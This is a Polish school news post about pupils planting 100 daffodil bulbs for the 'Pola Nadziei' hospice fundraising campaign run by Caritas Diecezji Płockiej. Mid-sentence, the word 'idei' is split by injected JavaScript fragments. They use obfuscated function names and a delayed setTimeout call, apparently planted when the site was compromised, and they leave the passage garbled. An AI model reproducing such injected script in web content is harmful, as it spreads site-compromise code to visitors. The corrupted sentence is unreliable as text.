Ogólnopolska akcja „Pola Nadziei”

W tym roku nasza szkoła z inicjatywy Szkolnego Klubu Wolontariatu przystąpiła do ogólnopolskiej akcji „Pola Nadziei”. Celem akcji jest szerzenie idom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dei hospicyjnej oraz wolontariatu, pozyskiwanie środków finansowych na opiekę nad nieuleczalnie chorymi oraz uwrażliwienie dzieci i młodzieży na potrzeby osób chorych. Akcja prowadzona jest przez Caritas Diecezji Płockiej, która otacza opieką pacjentów w siedmiu hospicjach w Płocku, Pułtusku Nasielsku, Przasnyszu i Żurominie. Pola Nadziei to akcja, która przebiega w kilku etapach. Pierwszy to sadzenie cebulek żonkili i właśnie 24 października uczniowie naszej szkoły zasadzili 100 cebulek żonkili na terenie naszej szkoły. Teraz pozostało nam tylko czekać na wiosnę z nadzieją, że pięknie rozkwitnie nasze własne POLE NADZIEI.